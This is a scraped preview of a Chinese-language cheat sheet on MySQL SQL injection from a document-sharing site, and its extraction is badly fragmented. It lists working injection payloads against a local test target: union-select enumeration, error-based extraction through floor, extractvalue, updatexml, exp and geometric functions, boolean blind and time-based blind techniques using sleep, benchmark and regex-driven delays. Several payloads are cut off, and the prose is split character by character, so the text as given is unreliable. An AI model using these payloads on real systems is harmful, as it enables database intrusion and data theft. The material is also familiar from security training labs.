没有合适的资源?快使用搜索试试~ 我知道了~
简介本是关于Mysql注相关知识的总结,Mysql利式较为灵活,这总结了些常的姿势。注:union select 前的语句出错,他才会执。报错注报错函数#flo
资源详情
资源评论
资源推荐
M
ysq
l
注
⼊
总
结
简
介
本
⽂
是
关
于
M
ysq
l
注
⼊
相
关
知
识
的
总
结
,
M
ysq
l
利
⽤
⽅
式
较
为
灵
活
,
这
⾥
总
结
了
⼀
些
常
⽤
的
姿
势
。
un
i
on
s
elec
t
注
⼊
注
:
un
i
on
s
elec
t
前
⾯
的
语
句
出
错
,
他
才
会
执
⾏
。
报
错
注
⼊
报
错
函
数
0
X
00
0
x
01
1
2
3
http://127.0.0.1/?id=1' order by 5 --+
http://127.0.0.1/?id=-1' union select 1,2,3,4,5 --+
http://127.0.0.1/?id=-1' union select 1,database(),3,4,5 --+
0
X
02
1
2
3
4
5
6
7
8
1.floor()
#floor()
报
错
原
理
,
count
和
group by
遇
到
rand
会产
⽣
重
复
值
这
三个
函
数
在
⼀
起
组
合
就
会
出
错
,
和
位
置
没
有
关
系
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(
2.extractvalue()
#EXTRACTVALUE (XML_document, XPath_string);
#XML_document
是
String
格
式
,
为
XML
⽂
档
对
象
的
名
称
#XPath_string (Xpath
格
式
的
字
符
串
)
,不
是
该
格
式
就
会
报
错
,
利
⽤
concat
拼
接
特
殊
符
号
来
实
现
报
错
原
创
li
x
i
n
8
⽉
31
⽇
S
e
r
a
p
h
安
全加
油
站
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
#UPDATEXML (XML_document, XPath_string, new_value);
#XML_document
是
String
格
式
,
为
XML
⽂
档
对
象
的
名
称
,
#XPath_string (Xpath
格
式
的
字
符
串
)
,不
是
该
格
式
就
会
报
错
,
利
⽤
concat
拼
接
特
殊
符
号
来
实
现
报
错
#new_value
,
String
格
式
,
替
换
查
找
到
的
符
合
条
件
的
数据
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
注
:
extractvalue()
函
数
,
updatexml()
函
数
能
查
询
字
符
串
的
最
⼤
⻓
度
是
32
,
如
果
超
过
则
也
需
要
使
⽤
substring()
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(sele
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user(
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select use
盲
注
布尔
盲
注
通过
字
符
串
截
取
对
⽐
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user(
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select
10.exp()
#exp()
报
错
的
原
理
,
⼿
册
说
到
exp
是
⼀个
数
学
函
数
取
e
的
x
次
⽅
,
当
我
们
输
⼊
的
值
⼤
于
709
就
会
报
错
然
后
~
取反
它
的
值
select * from test where id=1 and exp(~(select * from(select user())a));
注
意
:
当
mysql
版
本
>5.5.53
时
,
⽆
法
利
⽤
exp()
函
数
0
X
03
1
2
3
4
5
http://127.0.0.1/sqli/Less-1/?id=1' and ascii(substr((select user()),1,1))=100 -- +
substring(),min()
同
substr()
ord()
函
数
同
ascii()
,
将字
符
转
为
ascii
值
时
间
盲
注
时
间
盲
注
也
叫
延
时
注
⼊
⼀
般
⽤
到函
数
sleep()
BENCHMARK()
还
可
以使
⽤
笛
卡
尔
积
(
尽
量
不
要
使
⽤
,
内
容
太多
会
很
慢
很
慢
)
。
⼀
般
时
间
盲
注
我
们
还
需
要
使
⽤
条
件
判
断
函
数
if()
if
(
expre1
,
expre2
,
expre3
)
当
e
xpr
e
1
为
tru
e
时
,
返
回
e
xpr
e
2
,
fal
s
e
时
,
返
回
e
xpr
e
3
。
6
7
select user() regexp '^ro'
判
断
user()
前
两
位
是
否
为
ro,
正
确
返
回
1
,
错
误
返
回
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
延
迟
函
数
:
sleep(5)
http://127.0.0.1/sqli/Less-1/?id=1' and if((select ord(substring(database(),1,1))) = 9
benchmark(count,expr),
是
重
复
执
⾏
count
次
expr
表
达
式
,
使
得
处
理
时
间
很
⻓
,
来
产
⽣
延
迟
。
笛
卡
尔
积
(
因
为
连
接
表
是
⼀个
很
耗
时
的
操
作
)
:
AxB=A
和
B
中
每
个
元
素
的
组
合
所
组
成
的
集
合
,
就
是
连
接
表
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, infor
RLIKE REGEXP
正
则
匹
配
:
通过
rpad
或
repeat
构
造
⻓
字
符
串
,
加
以
计
算
量
⼤
的
pattern
,
通过
repeat
的
参
数
可
以
控
制
延
时
⻓
短
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
RPAD(str,len,padstr)
⽤
字
符
串
padstr
对
str
进
⾏
右
边
填
补
直
⾄
它
的
⻓
度
达
到
len
个
字
符
⻓
度
,
然
后
返
回
str
。
如
果
str
的
⻓
度
⻓
于
le
mysql> SELECT RPAD('hi',5,'?'); -> 'hi???'
repeat(str,times)
复
制
字
符
串
times
次
剩余24页未读,继续阅读
陈后主
- 粉丝: 30
- 资源: 340
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0